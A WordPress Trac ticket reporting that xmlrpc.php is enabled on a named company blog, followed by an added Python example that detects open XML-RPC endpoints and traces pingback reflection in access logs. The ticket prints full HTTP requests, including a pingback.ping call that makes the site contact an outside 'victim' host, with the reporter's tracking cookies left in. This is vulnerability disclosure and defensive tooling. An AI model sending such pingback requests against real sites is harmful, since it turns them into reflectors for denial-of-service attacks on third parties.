[wp-trac] [WordPress Trac] #47551: xmlrpc.php file is enabled. It can be used for brute-force attack and denial of service

WordPress Trac noreply at wordpress.org
Mon Jun 17 14:37:06 UTC 2019


#47551: xmlrpc.php file is enabled. It can be used for brute-force attack and denial
of service
----------------------------+-----------------------------
 Reporter:  pranayjain2511  |      Owner:  (none)
     Type:  defect (bug)    |     Status:  new
 Priority:  normal          |  Milestone:  Awaiting Review
Component:  XML-RPC         |    Version:  5.0.1
 Severity:  normal          |   Keywords:  needs-patch
  Focuses:                  |
----------------------------+-----------------------------
 https://blog.optimizely.com/ is a WordPress site

 WordPress sites that have xmlrpc.php enabled for pingbacks, trackbacks, etc. can
 be made part of a huge botnet, causing a major DDoS. The website
 https://blog.optimizely.com/ has the xmlrpc.php file enabled and could
 thus potentially be used for such an attack against other victim hosts.
 To determine whether the xmlrpc.php file is enabled, send the request
 below using the Repeater tab in Burp.

 POST /xmlrpc.php HTTP/1.1
 Host: blog.optimizely.com
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
 Firefox/60.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: optimizelyEndUserId=appuid1560332752535r0.612773859597;
 ajs_user_id=null; ajs_group_id=null; _ga=GA1.2.1174789383.1560332759;
 ajs_anonymous_id=%22c0afa840-96c3-49f6-a1b2-6aba203b1da1%22;
 OptanonConsent=landingPath=NotLandingPage&datestamp=Sat+Jun+15+2019+14%3A19%3A09+GMT%2B0530+(IST)&version=4.4.0&EU=false&groups=0_137018%3A1%2C0_137037%3A1%2C1%3A1%2C0_83485%3A1%2C0_84623%3A1%2C123%3A1%2C2%3A1%2C0_137040%3A1%2C3%3A1%2C154%3A1%2C4%3A1%2C0_85305%3A1%2C173%3A1%2C0_87040%3A1%2C101%3A1%2C0_84626%3A1%2C0_87042%3A1%2C0_83478%3A1%2C0_137008%3A1%2C0_137015%3A1%2C0_137039%3A1%2C117%3A1%2C0_137131%3A1%2C0_137030%3A1%2C132%3A1%2C128%3A1%2C164%3A1%2C0_85872%3A1%2C0_85873%3A1%2C0_137012%3A1%2C0_137059%3A1%2C0_83482%3A1%2C0_83484%3A1%2C0_83483%3A1&AwaitingReconsent=false;
 _gcl_au=1.1.17915353.1560333353; marketo_utm_content=webpromo-
 login1-everyone; marketo_utm_medium=referral;
 marketo_utm_source=optimizely; _mkto_trk=id:361-GER-922&token:_mch-
 optimizely.com-1560333355657-34661;
 amplitude_id_12138f24f4eb62c4ce13454cf1876f9doptimizely.com=eyJkZXZpY2VJZCI6ImYwZDdjMTc1LTc4NzYtNDg3My1hNTBlLWNlMGFjMGQ2YTQyN1IiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU2MDU4ODQwNTU1NSwibGFzdEV2ZW50VGltZSI6MTU2MDU4ODU3MTcwMCwiZXZlbnRJZCI6MTYsImlkZW50aWZ5SWQiOjMsInNlcXVlbmNlTnVtYmVyIjoxOX0=;
 _fbp=fb.1.1560333359887.541662801; __qca=P0-1900880018-1560333359980;
 _gid=GA1.2.871921774.1560541163;
 sgPopupDetails4=%7B%22popupId%22%3A%224%22%2C%22openCounter%22%3A1%2C%22openLimit%22%3A%221%22%7D;
 amplitude_idundefinedoptimizely.com=eyJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOm51bGwsImxhc3RFdmVudFRpbWUiOm51bGwsImV2ZW50SWQiOjAsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjowfQ==
 Connection: close
 Upgrade-Insecure-Requests: 1
 Cache-Control: max-age=0
 Content-Length: 93

 <methodCall>
 <methodName>system.listMethods</methodName>
 <params>
 </params>
 </methodCall>

 Notice that a successful response is received, showing that the xmlrpc.php
 file is enabled.
 Now, considering the domain https://blog.optimizely.com, the xmlrpc.php
 file discussed above could potentially be abused to cause a DDoS attack
 against a victim host. This is achieved by simply sending a request that
 looks like the one below.

 As soon as the above request is sent, the victim host
 (http://hackersera.com) gets an entry in its log file for a request
 originating from the https://blog.optimizely.com domain verifying the
 pingback.

 Remediation:

 If the xmlrpc.php file is not being used, it should be disabled and
 removed completely to avoid any potential risks. Otherwise, it should at
 the very least be blocked from external access.

 Thanks

 Note: screenshots are given below

 HTTP request
 POST /xmlrpc.php HTTP/1.1
 Host: blog.optimizely.com
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
 Firefox/60.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: optimizelyEndUserId=appuid1560332752535r0.612773859597;
 ajs_user_id=null; ajs_group_id=null; _ga=GA1.2.1174789383.1560332759;
 ajs_anonymous_id=%22c0afa840-96c3-49f6-a1b2-6aba203b1da1%22;
 OptanonConsent=landingPath=NotLandingPage&datestamp=Sat+Jun+15+2019+14%3A19%3A09+GMT%2B0530+(IST)&version=4.4.0&EU=false&groups=0_137018%3A1%2C0_137037%3A1%2C1%3A1%2C0_83485%3A1%2C0_84623%3A1%2C123%3A1%2C2%3A1%2C0_137040%3A1%2C3%3A1%2C154%3A1%2C4%3A1%2C0_85305%3A1%2C173%3A1%2C0_87040%3A1%2C101%3A1%2C0_84626%3A1%2C0_87042%3A1%2C0_83478%3A1%2C0_137008%3A1%2C0_137015%3A1%2C0_137039%3A1%2C117%3A1%2C0_137131%3A1%2C0_137030%3A1%2C132%3A1%2C128%3A1%2C164%3A1%2C0_85872%3A1%2C0_85873%3A1%2C0_137012%3A1%2C0_137059%3A1%2C0_83482%3A1%2C0_83484%3A1%2C0_83483%3A1&AwaitingReconsent=false;
 _gcl_au=1.1.17915353.1560333353; marketo_utm_content=webpromo-
 login1-everyone; marketo_utm_medium=referral;
 marketo_utm_source=optimizely; _mkto_trk=id:361-GER-922&token:_mch-
 optimizely.com-1560333355657-34661;
 amplitude_id_12138f24f4eb62c4ce13454cf1876f9doptimizely.com=eyJkZXZpY2VJZCI6ImYwZDdjMTc1LTc4NzYtNDg3My1hNTBlLWNlMGFjMGQ2YTQyN1IiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU2MDU4ODQwNTU1NSwibGFzdEV2ZW50VGltZSI6MTU2MDU4ODU3MTcwMCwiZXZlbnRJZCI6MTYsImlkZW50aWZ5SWQiOjMsInNlcXVlbmNlTnVtYmVyIjoxOX0=;
 _fbp=fb.1.1560333359887.541662801; __qca=P0-1900880018-1560333359980;
 _gid=GA1.2.871921774.1560541163;
 sgPopupDetails4=%7B%22popupId%22%3A%224%22%2C%22openCounter%22%3A1%2C%22openLimit%22%3A%221%22%7D;
 amplitude_idundefinedoptimizely.com=eyJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOm51bGwsImxhc3RFdmVudFRpbWUiOm51bGwsImV2ZW50SWQiOjAsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjowfQ==
 Connection: close
 Upgrade-Insecure-Requests: 1
 Cache-Control: max-age=0
 Content-Length: 234

 <methodCall>
 <methodName>pingback.ping</methodName>
 <params>
 <param><value><string>http://hackersera.com</string></value></param>
 <param><value><string>https://blog.optimizely.com</string></value></param>
 </params>
 </methodCall>

 Note: please find attachments for the PoC at the following URL:
 https://drive.google.com/folderview?id=18ZR6OK8WH2FnFu2vviw5EvyvWu5qMbEn

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/47551>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
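Added example, not part of the ticket and not WordPress code: a Python version of the check the reporter does in Burp (the system.listMethods probe and how to read the reply, including a fault reply and an HTML block page), plus the victim-side view of the last step, picking pingback verification fetches out of an access log and recovering the address that called pingback.ping. The User-Agent pattern assumed for WordPress's pingback fetch, the example hosts and addresses, and the sample replies and log lines are assumptions and constructed data, not captures from the ticket.

```python
"""Added example: not from the Trac ticket and not WordPress code.
Part 1 reproduces the ticket's system.listMethods probe and reads the reply.
Part 2 is the victim side of the ticket's last step: find the pingback
verification fetches in an access log and recover who sent pingback.ping.
Hosts, IPs, replies and log lines are constructed sample data.
"""
import re
import xmlrpc.client
from urllib import request as urlrequest
from urllib.error import HTTPError
from xml.parsers.expat import ExpatError

# ---- Part 1: does xmlrpc.php answer, and does it expose pingback.ping? ----

def build_list_methods_request() -> bytes:
    """Same payload the ticket sends from Burp Repeater."""
    return xmlrpc.client.dumps((), methodname="system.listMethods").encode()

def classify_response(body: bytes) -> dict:
    """Interpret the body returned by POST /xmlrpc.php."""
    try:
        params, _ = xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as fault:
        # A <fault> still proves xmlrpc.php is parsing requests; it just refused this one.
        return {"xmlrpc": True, "pingback": False, "fault": fault.faultString}
    except (xmlrpc.client.ResponseError, ExpatError):
        # HTML error page or empty body: a web-server block rule, or not WordPress at all.
        return {"xmlrpc": False, "pingback": False, "fault": None}
    methods = set(params[0]) if params and isinstance(params[0], list) else set()
    return {"xmlrpc": True, "pingback": "pingback.ping" in methods, "fault": None}

def probe(site_url: str, timeout: float = 10.0) -> dict:
    """Live check (needs network, not exercised offline): POST the probe to <site>/xmlrpc.php."""
    req = urlrequest.Request(site_url.rstrip("/") + "/xmlrpc.php", method="POST",
                             data=build_list_methods_request(),
                             headers={"Content-Type": "text/xml"})
    try:
        with urlrequest.urlopen(req, timeout=timeout) as resp:
            return classify_response(resp.read())
    except HTTPError as err:  # a 403/405 from a block rule still has a body to classify
        return dict(classify_response(err.read()), http_status=err.code)

# Constructed replies: a site with pingbacks exposed, and one answering with a fault.
SAMPLE_OPEN_REPLY = b"""<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><params><param><value><array><data>
<value><string>system.listMethods</string></value>
<value><string>pingback.ping</string></value>
<value><string>wp.getUsersBlogs</string></value>
</data></array></value></param></params></methodResponse>"""
SAMPLE_FAULT_REPLY = b"""<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><fault><value><struct>
<member><name>faultCode</name><value><int>405</int></value></member>
<member><name>faultString</name><value><string>XML-RPC services are disabled on this site.</string></value></member>
</struct></value></fault></methodResponse>"""

# ---- Part 2: the victim's access log (combined log format) ----

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
# User-Agent WordPress sends when it fetches a pingback's source URL. Recent releases
# append "; verifying pingback from <client ip>", old ones do not, so that part is
# optional (assumption about the exact string: compare against your own logs).
WP_PINGBACK_UA = re.compile(
    r"^WordPress/(?P<version>[^;]+); (?P<site>[^;]+)"
    r"(?:; verifying pingback from (?P<origin>\S+))?$")

def find_pingback_fetches(log_lines) -> list:
    """One record per request that looks like a WordPress pingback verification."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        ua = WP_PINGBACK_UA.match(m.group("ua")) if m else None
        if ua:
            hits.append({"reflector_ip": m.group("ip"),      # WordPress site doing the fetch
                         "reflector_site": ua.group("site"),
                         "wp_version": ua.group("version"),
                         "origin_ip": ua.group("origin")})  # caller of pingback.ping, or None
    return hits

def reflectors_per_origin(hits) -> dict:
    """How many distinct WordPress sites each origin address bounced through."""
    seen = {}
    for h in hits:
        seen.setdefault(h["origin_ip"] or "unknown", set()).add(h["reflector_site"])
    return {origin: len(sites) for origin, sites in seen.items()}

# Constructed log lines (documentation-range addresses and .example hosts).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Jun/2019:14:30:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "WordPress/5.0.1; https://wp-a.example; verifying pingback from 198.51.100.23"
203.0.113.8 - - [17/Jun/2019:14:30:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "WordPress/5.2.1; https://wp-b.example; verifying pingback from 198.51.100.23"
203.0.113.9 - - [17/Jun/2019:14:30:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "WordPress/3.8; https://old.example"
198.51.100.44 - - [17/Jun/2019:14:30:03 +0000] "GET /about HTTP/1.1" 200 800 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
""".splitlines()
```

classify_response separates three outcomes the ticket's screenshot-based check does not: a method list (xmlrpc.php is up; the interesting bit is whether pingback.ping is in it), a fault (the endpoint is still parsing requests, it only refused this call), and a body that is not XML-RPC at all, such as the HTML 403 page a web-server block rule of the kind the remediation asks for would return. On the victim side, the address the log records is the reflecting WordPress site; the party that actually called pingback.ping only shows up inside the User-Agent string, and not at all on old releases, which is why the summary keys on that field with "unknown" as the fallback.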